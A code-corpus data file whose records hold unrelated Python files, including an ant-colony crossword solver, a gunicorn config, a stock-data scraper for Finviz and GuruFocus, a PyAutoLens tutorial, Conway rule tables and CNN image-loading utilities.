parameters[3]\n self.__rho = parameters[4]\n self.__q0 = parameters[5]\n \n def getNoEpoch(self):\n return self.__noEpoch\n \n def getNoAnts(self):\n return self.__noAnts\n \n def getAlpha(self):\n return self.__alpha\n \n def getBeta(self):\n return self.__beta\n \n def getRho(self):\n return self.__rho\n \n def getQ0(self):\n return self.__q0\n \n def getLines(self):\n return self.__lines\n \n def getColumns(self):\n return self.__columns\n \n def getBlanks(self):\n return self.__blanks\n \n def getMatrix(self):\n return self.__matrix\n \n def getSlots(self):\n return self.__slots\n \n def getWords(self):\n return self.__words\n \n def getIndividualSize(self):\n return len(self.__slots)\n \n def stringMatrix(self):\n matrix = self.__matrix\n s = ''\n for i in range(self.__lines):\n for j in range(self.__columns):\n m = matrix[i][j]\n s += str(m)\n s += ' '\n s += \"\\n\"\n return s\n \n def readFromFileParameters(self, fileNameParameters):\n parameters = []\n try:\n fd = open(fileNameParameters, 'r')\n noEpoch = int(fd.readline())\n parameters.append(noEpoch)\n noAnts = int(fd.readline())\n parameters.append(noAnts)\n alpha = float(fd.readline())\n parameters.append(alpha)\n beta = float(fd.readline())\n parameters.append(beta)\n rho = float(fd.readline())\n parameters.append(rho)\n q0 = float(fd.readline())\n parameters.append(q0)\n except IOError:\n print(\"error\")\n \n return parameters\n \n \n def readFromFileWords(self, fileName):\n words = []\n try:\n fd = open(fileName, 'r')\n words = fd.readline().split(',')\n except IOError:\n print(\"error\")\n return words\n \n def readFromFile(self, fileName):\n try:\n fd = open(fileName, 'r')\n lin = int(fd.readline())\n col = int(fd.readline())\n blanks = 
int(fd.readline())\n myMatrix = [[0 for x in range(col)] for y in range(lin)]\n for line in fd:\n (k, v) = line.split(' ')\n i1 = int(k)\n i2 = int(v)\n myMatrix[i1][i2] = '#'\n \n except IOError:\n print(\"error\")\n \n list=[]\n coloana = 0\n i = 0\n nrCrt = 0\n while i < lin:\n while myMatrix[i][coloana] == '#':\n coloana += 1\n if coloana == col:\n i += 1\n coloana = 0\n retCol = coloana\n length = 0\n while coloana < col and myMatrix[i][coloana] != '#':\n length += 1\n coloana += 1\n if length > 1:\n myTuple = [nrCrt, 0, i, retCol, length]\n nrCrt += 1\n list.append(myTuple)\n if coloana == col:\n i += 1\n coloana = 0\n \n linie = 0\n j = 0\n while j < col:\n while myMatrix[linie][j] == '#':\n linie += 1\n if linie == lin:\n j += 1\n linie = 0\n retLin = linie\n length = 0\n while linie < lin and myMatrix[linie][j] != '#':\n length += 1\n linie += 1\n if length > 1:\n myTuple = [nrCrt, 1, retLin, j, length]\n nrCrt += 1\n list.append(myTuple)\n if linie == lin:\n j += 1\n linie = 0\n \n return [lin, col, blanks, myMatrix, list]\n\nclass Ant:\n def __init__(self, problem):\n self.problem = problem\n self.size = problem.getIndividualSize()\n self.path = [randint(0,self.size-1)]\n self.matrix = problem.getMatrix()\n self.slots = problem.getSlots()\n self.words = problem.getWords()\n self.lines = problem.getLines()\n self.columns = problem.getColumns()\n \n def getSize(self):\n return self.size\n \n def getPath(self):\n return self.path\n \n def getNextIndex(self):\n return len(self.path)\n \n def fillCrossword(self):\n position = self.getNextIndex()\n matrix = deepcopy(self.matrix)\n words = self.words\n for i in range(position):\n slotNumber = self.path[i]\n slot = self.slots[slotNumber]\n if slot[1] == 0:\n x = slot[2]\n y = slot[3] - 1\n length = 0\n allowed = True\n while y < self.columns:\n y += 1\n while length < len(words[i]) and allowed == True:\n if matrix[x][y] == 0:\n matrix[x][y] = words[i][length]\n y += 1\n length += 1\n elif matrix[x][y] == \"#\":\n allowed = False\n break\n else:\n if words[i][length] != matrix[x][y]:\n matrix[x][y] = words[i][length]\n y += 1\n length += 1\n else:\n matrix[x][y] = words[i][length]\n y += 1\n length += 1 \n if y == self.columns and length < len(words[i]):\n allowed = False\n break\n else:\n y = slot[3]\n x = slot[2] - 1\n length = 0\n allowed = True\n while x < self.lines:\n x += 1\n while length < len(words[i]) and allowed == True:\n if matrix[x][y] == 0:\n matrix[x][y] = words[i][length]\n x += 1\n length += 1 \n elif matrix[x][y] == \"#\":\n allowed = False\n break\n else:\n if words[i][length] != matrix[x][y]:\n matrix[x][y] = words[i][length]\n x += 1\n length += 1 \n else:\n matrix[x][y] = words[i][length]\n x += 1\n length += 1 \n if x == self.lines and length < len(words[i]):\n allowed = False\n break\n return matrix\n \n def remainingSlots(self):\n remaining = []\n remainingSlots = []\n for i in range(self.size):\n if i not in self.path:\n remaining.append(i)\n for slot in self.slots:\n if slot[0] in remaining:\n remainingSlots.append(slot)\n return remainingSlots\n \n def filterSlotsByLength(self, length):\n slots = self.remainingSlots()\n filtered = []\n for slot in slots:\n if slot[4] == length:\n filtered.append(slot)\n return filtered\n \n def nextWordIndex(self, a):\n for i in range(len(self.path)):\n if self.path[i] == a:\n return i + 1 \n \n def nextMoves(self):\n words = self.words\n nextPossibleMoves = []\n remainingSlots = []\n remainingSlots = self.remainingSlots()\n index = self.getNextIndex()\n if index >= 
self.size:\n return []\n length = len(self.words[index])\n goodLengthSlots = self.filterSlotsByLength(length)\n if goodLengthSlots == []:\n return goodLengthSlots\n else:\n for slot in goodLengthSlots:\n matrix = self.fillCrossword()\n accepted = True\n if slot[1] == 0:\n x = slot[2]\n y = slot[3] - 1\n leng = 0\n allowed = True\n while y < self.columns:\n y += 1\n while leng < len(words[index]) and allowed == True:\n if matrix[x][y] == 0:\n matrix[x][y] = words[index][leng]\n y += 1\n leng += 1\n else:\n if words[index][leng] != matrix[x][y]:\n allowed = False\n accepted = False\n break\n else:\n matrix[x][y] = words[index][leng]\n y += 1\n leng += 1\n else:\n y = slot[3]\n x = slot[2] - 1\n leng = 0\n allowed = True\n while x < self.lines:\n x += 1\n while leng < len(words[index]) and allowed == True:\n if matrix[x][y] == 0:\n matrix[x][y] = words[index][leng]\n x += 1\n leng += 1 \n else:\n if words[index][leng] != matrix[x][y]:\n x += 1\n leng += 1 \n accepted = False\n allowed = False\n break \n else:\n matrix[x][y] = words[index][leng]\n x += 1\n leng += 1 \n if accepted == True:\n nextPossibleMoves.append(slot[0])\n \n return nextPossibleMoves \n \n def fitness(self):\n return (self.size - len(self.path) + 1)\n \n def calculateDistance(self, next):\n ant = Ant(self.problem)\n ant.path = self.path.copy()\n ant.path.append(next)\n rest = self.size - len(ant.path) + 1\n return (rest - len(ant.nextMoves()))\n \n def addMove(self, traceMatrix, alpha, beta, q0):\n p = [0 for i in range(self.size)]\n nextMoves=self.nextMoves()\n if len(nextMoves) == 0:\n return False\n for i in nextMoves:\n p[i] = self.calculateDistance(i)\n r =[(p[i]**beta)*(traceMatrix[self.path[-1]][i]**alpha) for i in range(len(p))]\n rnd1 = random()\n if rnd1 < q0:\n r = [[i, p[i]] for i in range(len(p))]\n r = max(r, key=lambda a: a[1])\n self.path.append(r[0])\n else:\n s = sum(p)\n if s == 0:\n return choice(nextMoves)\n p = [p[i] / s for i in range(len(p))]\n p = [sum(p[0 : i + 1]) for i in range(len(p))]\n rnd2 = random()\n i = 0\n while rnd2 > p[i]:\n i += 1\n self.path.append(i)\n return True \n \n \nclass Controller:\n def __init__(self, problem):\n self.problem = problem;\n self.size = problem.getIndividualSize()\n self.noEpoch = problem.getNoEpoch()\n self.noAnts = problem.getNoAnts()\n self.alpha = problem.getAlpha()\n self.beta = problem.getBeta()\n self.rho = problem.getRho()\n self.q0 = problem.getQ0()\n \n def getSize(self):\n return self.size\n \n def getNoEpoch(self):\n return self.noEpoch\n \n def getNoAnts(self):\n return self.noAnts\n \n def getAlpha(self):\n return self.alpha\n \n def getBeta(self):\n return self.beta\n \n def getRho(self):\n return self.rho\n \n def getQ0(self):\n return self.q0\n \n \n def epoch(self, problem, trace):\n noAnts = problem.getNoAnts()\n size = problem.getIndividualSize()\n alpha = problem.getAlpha()\n beta = problem.getBeta()\n rho = problem.getRho()\n q0 = problem.getQ0()\n \n population = []\n for i in range(noAnts):\n ant = Ant(problem)\n population.append(ant)\n for i in range(size):\n for ant in population:\n ant.addMove(trace, alpha, beta, q0)\n t = [1.0 / population[i].fitness() for i in range(len(population))]\n for i in range(size):\n for j in range(size):\n trace[i][j] = (1 - rho) * trace[i][j]\n for i in range(len(population)):\n for j in range(len(population[i].path) - 1):\n x = population[i].path[j]\n y = population[i].path[j + 1]\n trace[x][y] = trace[x][y] + t[i]\n fitness = [[population[i].fitness(), i] for i in range(len(population))]\n fitness = 
min(fitness)\n return population[fitness[1]].path\n \n \ndef main():\n problem = Problem(\"data01.in\", \"data02.in\", \"param01.in\")\n controller = Controller(problem);\n size = controller.getSize()\n noEpoch = controller.getNoEpoch()\n noAnts = controller.getNoAnts()\n alpha = controller.getAlpha()\n beta = controller.getBeta()\n rho = controller.getRho()\n q0 = controller.getQ0()\n solution = []\n bestSolution = []\n pheromoneMatrix = [[1 for i in range(size)] for j in range (size)]\n for i in range(noEpoch):\n solution = controller.epoch(problem, pheromoneMatrix)\n if len(solution)>len(bestSolution):\n bestSolution=solution.copy()\n fitness = problem.getIndividualSize() - len(bestSolution)\n print(\"fitness: \", fitness)\n print(\"solution: \", bestSolution)\n return fitness\n\nmain()","sub_path":"ACOCrossword/src/Crossword.py","file_name":"Crossword.py","file_ext":"py","file_size_in_byte":15460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"429683547","text":"import multiprocessing\nimport os\nfrom os.path import join, dirname, realpath\n\ncurrent_dir = realpath(dirname(dirname(__file__)))\n\nos.makedirs(join(current_dir, 'logs'), mode=0o700, exist_ok=True)\n\nbind = '127.0.0.1:9009'\nbacklog = 128\nworkers = multiprocessing.cpu_count() * 2 + 1\nworker_class = 'aiohttp.worker.GunicornWebWorker'\npidfile = join(current_dir, 'myfeed.pid')\naccesslog = join(current_dir, 'logs/gunicorn.log')\nerrorlog = join(current_dir, 'logs/gunicorn.log')\nloglevel = 'info'\napp_name = 'webapp:app'\naccess_log_format = '%a %l %u %t \"%r\" %s %b \"%{Referrer}i\" \"%{User-Agent}i\"'\ndaemon = True\n\n# Run this command to start gunicorn\n# $ gunicorn --config gunicorn_config.py webapp:app\n","sub_path":"myfeed/web/config/gunicorn_config.py","file_name":"gunicorn_config.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"129397287","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom resumecollection.resume.v1.views import CandidateProfileView\n\napp_name = \"resume\"\n\nrouter = DefaultRouter()\n\nrouter.register(r\"\", CandidateProfileView, basename=\"v1-resume\")\n\nurlpatterns = [\n path(\n \"/get_candidate_chain_references/\",\n CandidateProfileView.as_view({\"get\": \"get_candidate_chain_references\"}),\n ),\n path(\"\", include(router.urls)),\n]\n","sub_path":"resumecollection/resume/v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"3818197","text":"from tests.v1.views import TCBase\n\n\nclass ExcelDownloadTCBase(TCBase):\n def _test(self, uri):\n \"\"\"\n - Test\n Download excel file with served uri\n * Validation\n (1) status code : 200\n (2) response data type : application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\n \"\"\"\n resp = self.request(\n self.client.get,\n uri,\n {},\n self.admin_access_token\n )\n\n # (1)\n self.assertEqual(resp.status_code, 200)\n\n # (2)\n self.assertEqual(resp.content_type, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n","sub_path":"Server/tests/v1/views/admin/apply/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"631966710","text":"import requests\nfrom bs4 import 
BeautifulSoup\nimport pandas as pd\nimport progressbar\nimport re\nfrom datetime import datetime\nimport pygsheets\n# set Google Sheets variables\nimport user_specific_variables\n\ndef scrape_finviz(symbols):\n\n # Get Column Header\n req = requests.get(\"https://finviz.com/quote.ashx?t=FB\")\n soup = BeautifulSoup(req.content, 'html.parser')\n table = soup.find_all(lambda tag: tag.name == 'table')\n rows = table[8].findAll(lambda tag: tag.name == 'tr')\n out = []\n for i in range(len(rows)):\n td = rows[i].find_all('td')\n out = out + [x.text for x in td]\n\n # Adding actual headers: Ticker, Sector, Sub-sector and country plus all from the finviz table\n # and then 5 from GuruFocus\n guru_ls = ['Piotroski F-Score', 'Altman Z-Score', 'Beneish M-Score']\n ls = ['Ticker', 'Sector', 'Sub-Sector', 'Country'] + out[::2] + guru_ls + ['ROIC', 'WACC']\n\n dict_ls = {k: ls[k] for k in range(len(ls))}\n df = pd.DataFrame()\n p = progressbar.ProgressBar()\n p.start()\n for j in range(len(symbols)):\n p.update(j / len(symbols) * 100)\n\n # Initialize FinViz parsing\n req = requests.get(\"https://finviz.com/quote.ashx?t=\" + symbols[j])\n if req.status_code != 200:\n continue\n soup = BeautifulSoup(req.content, 'html.parser')\n table = soup.find_all(lambda tag: tag.name == 'table')\n\n # Initialize GuruFocus table parsing (3 values for all the symbols)\n if (symbols[j].find('-')):\n guru_symbol = symbols[j].replace('-', '.')\n guru_req = requests.get(\"https://www.gurufocus.com/stock/\" + guru_symbol)\n if guru_req.status_code != 200:\n continue\n guru_soup = BeautifulSoup(guru_req.content, 'html.parser')\n\n # Process tables from BS\n rows = table[6].findAll(lambda tag: tag.name == 'tr')\n sector = []\n for i in range(len(rows)):\n td = rows[i].find_all('td')\n sector = sector + [x.text for x in td]\n sector = sector[2].split('|')\n rows = table[8].findAll(lambda tag: tag.name == 'tr')\n out = []\n for i in range(len(rows)):\n td = rows[i].find_all('td')\n out = out + [x.text for x in td]\n out = [symbols[j]] + sector + out[1::2]\n\n out_df = pd.DataFrame(out).transpose()\n df = df.append(out_df, ignore_index=True)\n\n scores = []\n\n for val in guru_ls[0:]:\n try:\n scores.append(guru_soup.find('a', string=re.compile(val)).find_next('td').text)\n except:\n scores.append('')\n\n try:\n roic_value = re.search(r'ROIC \\d+\\.\\d+', guru_soup.getText()).group(0)\n scores.append(roic_value.replace('ROIC ', ''))\n wacc_value = re.search(r'WACC \\d+\\.\\d+', guru_soup.getText()).group(0)\n scores.append(wacc_value.replace('WACC ', ''))\n except:\n scores.append('')\n scores.append('')\n\n df_len = len(df) - 1\n\n df.loc[df_len, guru_ls[0]] = scores[0]\n df.loc[df_len, guru_ls[1]] = scores[1]\n df.loc[df_len, guru_ls[2]] = scores[2]\n df.loc[df_len, ls[-2]] = scores[3]\n df.loc[df_len, ls[-1]] = scores[4]\n\n p.finish()\n df = df.rename(columns=dict_ls)\n\n gc = pygsheets.authorize(service_file=user_specific_variables.json_file)\n sheet = gc.open_by_key(user_specific_variables.sheet_key)\n\n worksheet = sheet.worksheet_by_title(user_specific_variables.worksheet_title)\n\n worksheet.clear(start='A1')\n worksheet.set_dataframe(df, start='A1', nan='')\n\n # Write output CSV from dataframe as a backup to local working directory as outputYYYY-MM-DD.csv\n output_file_with_date = 'output' + datetime.today().strftime('%Y-%m-%d') +'.csv'\n df.to_csv(output_file_with_date, index=False)\n\n return (df)\n\ndata = scrape_finviz(['msft', 'fb', 'aapl'])\n\n#data = scrape_finviz(['BKNG', 'REGN', 'ceo', 'SPGI', 'AAPL', 'FB', 
'GOOGL', 'ISRG', 'INTC', 'ITW', 'MSFT', 'anss', 'ROP',\n# 'ACN', 'IPGP', 'bsm', 'GWW', 'CAT', 'mcd', 'SPR', 'MMM', 'LLY', 'csl', 'MNST', 'hon', 'TWTR',\n# 'NVDA', 'pep', 'JNJ', 'tdg', 'rost', 'IBM', 'BRK-A', 'ndsn', 'OSK', 'ABBV', 'ssw', 'CLX', 'leco',\n# 'POOL',\n# 'lanc', 'expd', 'epam', 'GRMN', 'bti', 'lulu', 'CINF', 'sne', 'chrw', 'DIS', 'NEE', 'PSX', 'apd',\n# 'mplx', 'ev', 'SHW', 'cb', 'EEFT', 'CVX', 'lin', 'PFE', 'MKC', 'PPG', 'AFL', 'ess', 'jag', 'DOV',\n# 'brc', 'WEN', 'chd', 'eca', 'EMR', 'bf-b', 'CMCSA', 'GD', 'cmg', 'CPRI', 'ori', 'TGT', 'wst',\n# 'AMZN', 'ED', 'PNR', 'ADP', 'WM', 'BEN', 'ECL', 'alb', 'tjx', 'BEAT', 'pii', 'ko', 'fast', 'utx',\n# 'cf',\n# 'FRT', 'WBA', 'FCX', 'CCL', 'jw-a', 'VFC', 'CAH', 'ato', 'EXPE', 'nav', 'HRL', 'nvt', 'skt', 'msa',\n# 'sjm', 'dci', 'WMT', 'ful', 'SYY', 'nfg', 'SWK', 'cdk', 'GPC', 'bpy', 'pbct', 'NNN', 'bkh', 'awr',\n# 'O', 'atr', 'son', 'LOW', 'LEG', 'XOM', 'byd', 'ABT', 'BA', 'abm', 'NUE', 'UAA', 'bll', 'BDX',\n# 'crm', 'sfix', 'PG', 'CL', 'ugi', 'cwt', 'wtr', 'njr', 'adm', 'MDT', 'ktb', 'mdp', 'mdu', 'tds',\n# 'QSR',\n# 'rpm', 'FLR', 'NKTR', 'KHC', 'CSX', 'NSC', 'AOS', 'KMB', 'appf', 'NRG', 'ipg', 'T', 'CC', 'anet',\n# 'CTAS', 'amcr', 'rtn', 'lmt', 'hii', 'lulu', 'NOC', 'oxy', 'cop', 'eog', 'pxd', 'cxo', 'bmi',\n# 'fele', 'hp', 'jkhy', 'mgee', 'mgrc', 'mo', 'nwn', 'ph', 'scl', 'sjw', 'syk', 'tnc', 'tr', 'uvv'])\n","sub_path":"Finviz-Scraper.py","file_name":"Finviz-Scraper.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"379491843","text":"\r\nn= int(input(\"Enter a number: \"))\r\nsum = 0\r\ntemp = n\r\nwhile temp > 0:\r\n digit = temp % 10\r\n sum += digit ** 3\r\n temp //= 10\r\nif n == sum:\r\n print(\"Armstrong number\")\r\nelse:\r\n print(\"Not Armstrong number\")\r\n","sub_path":"PFSD/p26.py","file_name":"p26.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16622267","text":"def frzz(x, y):\n out = []\n length_x = len(x)\n length_y = len(y)\n window = length_y\n out.append(x[0])\n for i in range(length_x):\n if i + window <= length_x:\n m = 0\n for j in range(window):\n if j+i < length_x:\n a = x[i+j] * y[j]\n m += a\n out.append(m)\n out.append(y[-1])\n return out\n\n\nx = [1, 2, 3, 4, 5, 6, 7, 8, 9]\ny = [-1, 0, 1]\n\nprint(frzz(x, y))","sub_path":"frzzmul.py","file_name":"frzzmul.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"475216510","text":"# %%\n\"\"\"\nTutorial 8: Pipeline\n====================\n\nTo illustrate lens modeling using an _Inversion_ and _Pipeline_, we'll go back to the complex source model-fit that we\nperformed in tutorial 3 of chapter 3. This time, as you've probably guessed, we'll fit the complex source using an\n_Inversion_.\n\nWe'll begin by modeling the source with a _LightProfile_, to initialize the mass model and avoid the unphysical\nsolutions discussed in tutorial 6. 
We'll then switch to an _Inversion_.\n\"\"\"\n\n\"\"\" AUTOFIT + CONFIG SETUP \"\"\"\n\n# %%\n#%matplotlib inline\n\nfrom autoconf import conf\nfrom pyprojroot import here\n\nworkspace_path = str(here())\nprint(\"Workspace Path: \", workspace_path)\n\n# %%\n\"\"\"\nUse this path to explicitly set the config path and output path.\n\"\"\"\n\n# %%\nconf.instance = conf.Config(\n config_path=f\"{workspace_path}/howtolens/config\",\n output_path=f\"{workspace_path}/howtolens/output\",\n)\n\n# %%\n\"\"\" AUTOLENS + DATA SETUP \"\"\"\n\n# %%\nimport autofit as af\nimport autolens as al\nimport autolens.plot as aplt\n\n# %%\n\"\"\"\nWe'll use strong lensing data, where:\n\n - The lens galaxy's light is omitted.\n - The lens galaxy's _MassProfile_ is an _EllipticalIsothermal_.\n - The source galaxy's _LightProfile_ is four _EllipticalSersic_'s.\n\"\"\"\n\n# %%\nfrom howtolens.simulators.chapter_4 import lens_sie__source_sersic_x4\n\ndataset_type = \"chapter_4\"\ndataset_name = \"lens_sie__source_sersic_x4\"\ndataset_path = f\"{workspace_path}/howtolens/dataset/{dataset_type}/{dataset_name}\"\n\nimaging = al.Imaging.from_fits(\n image_path=f\"{dataset_path}/image.fits\",\n noise_map_path=f\"{dataset_path}/noise_map.fits\",\n psf_path=f\"{dataset_path}/psf.fits\",\n pixel_scales=0.1,\n)\n\nmask = al.Mask.circular(\n shape_2d=imaging.shape_2d, pixel_scales=imaging.pixel_scales, radius=3.0\n)\n\n\naplt.Imaging.subplot_imaging(imaging=imaging, mask=mask)\n\n# %%\n\"\"\"\n__Settings__\n\nThe *SettingsPhaseImaging* describe how the model is fitted to the data in the log likelihood function. We discussed\nthese in chapter 2, and a full description of all settings can be found in the example script:\n\n 'autolens_workspace/examples/model/customize/settings.py'.\n\nThe settings chosen here are applied to all phases in the pipeline. Note how we can use the _SettingsPixelization_\nobject to determine whether the border is used during the model-fit.\n\"\"\"\n\n# %%\nsettings_masked_imaging = al.SettingsMaskedImaging(sub_size=2)\nsettings_pixelization = al.SettingsPixelization(use_border=True)\n\nsettings = al.SettingsPhaseImaging(\n settings_masked_imaging=settings_masked_imaging,\n settings_pixelization=settings_pixelization,\n)\n\n# %%\n\"\"\"\n__Pipeline_Setup_And_Tagging__:\n\nFor this pipeline the pipeline setup customizes and tags:\n\n - The Pixelization used by the inversion of this pipeline.\n - The Regularization scheme used by of this pipeline.\n - If there is an external shear in the mass model or not.\n\"\"\"\n\n# %%\nsetup = al.SetupPipeline(\n pixelization=al.pix.VoronoiMagnification,\n regularization=al.reg.Constant,\n no_shear=False,\n folders=[\"c4_t8_inversion\"],\n)\n\n# %%\n\"\"\"\n__Pipeline Creation__\n\nTo create a pipeline we import it from the pipelines folder and run its 'make_pipeline' function, inputting the \n*Setup* and *SettingsPhase* above.\n\"\"\"\n\n# %%\nfrom howtolens.chapter_4_inversions import tutorial_8_pipeline\n\npipeline_inversion = tutorial_8_pipeline.make_pipeline(setup=setup, settings=settings)\n\n# Uncomment to run.\n# pipeline_inversion.run(dataset=imaging, mask=mask)\n\n# %%\n\"\"\"\nAnd with that, we now have a pipeline to model strong lenses using an inversion! 
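For reference, a pixelized source galaxy of the kind the inversion phases fit is set
up along the following lines. This is an illustrative sketch (not code copied from the
pipeline module) using the _Pixelization_ and _Regularization_ chosen in the
*SetupPipeline* above; the shape and coefficient values are placeholders:

    source_galaxy = al.Galaxy(
        redshift=1.0,
        pixelization=al.pix.VoronoiMagnification(shape=(30, 30)),
        regularization=al.reg.Constant(coefficient=1.0),
    )
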
Check out the example pipeline in\n'autolens_workspace/pipelines/examples/inversion_hyper_galaxies_bg_noise.py' for an example of an _Inversion_ pipeline \nthat includes the lens light component.\n\"\"\"\n","sub_path":"howtolens/chapter_4_inversions/scripts/tutorial_8_pipeline_runner.py","file_name":"tutorial_8_pipeline_runner.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"44316413","text":"import numpy as np\n\n\ndef update_conway():\n    update_func_conway = np.zeros(512, dtype=int)\n    for i in range(512):\n        conf_state_bin = np.binary_repr(i, width=9)\n        conf_state_bin_removed_center = conf_state_bin[0:4] + \\\n            conf_state_bin[5:9]\n        current_state = int(conf_state_bin[4])\n        num_neighbors_alive = sum([int(j)\n                                   for j in conf_state_bin_removed_center])\n\n        update_func_conway[i] = current_state  # STAY THE SAME BY DEFAULT\n        if current_state == 1:  # ALIVE\n            if num_neighbors_alive < 2 or num_neighbors_alive > 3:\n                update_func_conway[i] = 0  # DEAD\n        else:\n            if num_neighbors_alive == 3:\n                update_func_conway[i] = 1  # ALIVE\n\n    return update_func_conway\n\n\ndef update_random():\n    return np.random.randint(2, size=512)\n","sub_path":"CA_model/special_updates.py","file_name":"special_updates.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
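# ---- Added usage sketch (editorial commentary, not one of the dataset records) ----
# The rule table produced by update_conway() above maps each 9-bit neighborhood,
# encoded exactly like np.binary_repr(i, width=9) with the center cell at
# position 4, to the cell's next state. A grid can be stepped with that table as
# shown below; padding with zeros treats the border as dead cells, which is an
# assumption of this sketch, not something the original file specifies.
import numpy as np

def step(grid, rule):
    # surround the grid with dead cells so edge neighborhoods are well defined
    padded = np.pad(grid, 1, mode='constant')
    height, width = grid.shape
    out = np.empty_like(grid)
    for y in range(height):
        for x in range(width):
            # pack the 3x3 neighborhood, row-major, into a 9-bit index
            bits = padded[y:y + 3, x:x + 3].flatten()
            out[y, x] = rule[int(''.join(str(b) for b in bits), 2)]
    return out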
+{"seq_id":"77252128","text":"# Three state machine example ... bad code included.\r\n\r\n# variables\r\ntired = 0\r\nhunger = 0\r\n\r\nstates = ['sleeping','awake','eating']\r\ncurrent_state = 'sleeping'\r\n\r\nalive = True\r\nrunning = True\r\nmax_limit = 100\r\ngame_time = 0\r\n\r\nwhile running and alive:\r\n    game_time += 1\r\n\r\n    # Sleeping: reduces tired, hunger still increases\r\n    if current_state == 'sleeping':\r\n        # Do things for this state\r\n        print(\"Zzzzzz\")\r\n        tired -= 1\r\n        hunger += 1\r\n        # Check for change state\r\n        if tired < 5:\r\n            current_state = 'awake'\r\n\r\n    # Awake: does nothing interesting. gets hungry. gets tired\r\n    elif current_state == 'awake':\r\n        # Do things for this state\r\n        print(\"Bored.... BORED! ...\")\r\n        tired += 1\r\n        hunger += 1\r\n        # Check for change state\r\n        if hunger > 7:\r\n            current_state = 'eating'\r\n        if tired > 16:\r\n            current_state = 'sleeping'\r\n    \r\n    # Eating: reduces hunger, still gets tired\r\n    elif current_state == 'eating':\r\n        # Do things for this state\r\n        print(\"Num, num, num...\")\r\n        tired += 1\r\n        hunger -= 1\r\n        # Check for change state\r\n        if hunger < 8:\r\n            current_state = 'awake'\r\n    \r\n    # check for broken ... :(\r\n    else:\r\n        print(\"AH! BROKEN .... how did you get here?\")\r\n        die() # not a real function - just breaks things! :)\r\n\r\n    if hunger > 20:\r\n        alive = False\r\n    \r\n    # Check for end of game time\r\n    if game_time > max_limit:\r\n        running = False\r\n\r\nprint('-- The End --')\r\n\r\n\r\n    \r\n","sub_path":"FSM.py","file_name":"FSM.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"161651949","text":"import csv\nimport numpy as np\nfrom scipy import misc\nimport os \nfrom random import randint\n\n\n\ndef import_labels():\n    #extract the labels from the csv file\n    #return as matrix of one hot encoded vectors\n    #return 7000 x 9 matrix\n    labels = []\n    csvfile = open('data/train.csv')\n    for row in csvfile:\n        #retrieve labels for each image\n        try:\n            labels.append(int([x.strip() for x in row.split(',')][1]))\n        except ValueError:\n            continue\n    #transform integer values to one_hot encoded vector\n    n_values = np.max(labels) + 1\n    return np.eye(n_values)[labels], labels\n    \ndef load_data():\n    #split into train and validation and test\n    num_train = 4200\n    num_valid = 1400\n    num_test = 1400\n\n    #load set of training images if already exists\n    faces = []\n    try:\n        faces = np.load('training_set.npz')\n        return faces.f.arr_0\n        \n    except IOError:\n        file_names = []\n        #get file names\n        for filename in os.listdir('data/train'):\n            file_names.append(filename)\n        #sort file names\n        sorted_files = sorted(file_names, key=lambda y: int(y.rsplit('.')[0]))\n        \n        i = 0\n        for file in sorted_files:\n            print('reading image ' + str(i))\n            face_matrix = misc.imread('data/train/' + file)\n            faces.append(face_matrix)\n            i += 1\n        faces = np.array(faces) \n        faces = faces.reshape(faces.shape[0], 3, 128, 128)\n        np.savez_compressed('training_set', faces)\n        return faces\n    \n    \ndef load_sets():\n    #return the training, valid, and test set\n    num_train = 5600\n    num_test = 1400\n    \n    labels, label_ints = import_labels()\n    data = load_data()\n    #split the data into the \n    #8 classes and distribute accordingly\n    \n    #should distribute classes \n    class1 = []\n    class2 = []\n    class3 = []\n    class4 = []\n    class5 = []\n    class6 = []\n    class7 = []\n    class8 = []\n    \n    #store indices of classes in lists\n    for i in range(len(label_ints)):\n        if label_ints[i] == 1:\n            class1.append(i)\n        elif label_ints[i] == 2:\n            class2.append(i)\n        elif label_ints[i] == 3:\n            class3.append(i)\n        elif label_ints[i] == 4:\n            class4.append(i)\n        elif label_ints[i] == 5:\n            class5.append(i)\n        elif label_ints[i] == 6:\n            class6.append(i)\n        elif label_ints[i] == 7:\n            class7.append(i)\n        else:\n            class8.append(i)\n    \n    train = data[0:4200]\n    val = data[4200:5600]\n    test = data[5600:]\n    \n    train_labels = labels[0:4200]\n    val_labels = labels[4200:5600]\n    test_labels = labels[5600:]\n    \n    return (train,train_labels), (val, val_labels), (test, test_labels)\n    \n    \n    \n    \n\ndef transform_image(img):\n    #transforms an image by rotating it a random number of degrees\n    #(rotation is an assumed choice of augmentation; misc.imrotate\n    # comes from the scipy import at the top of this file)\n    angle = randint(0,360)\n    new_image = misc.imrotate(img, angle)\n    return new_image\n    \n    \n    \n    \n    ","sub_path":"CnnUtils.py","file_name":"CnnUtils.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
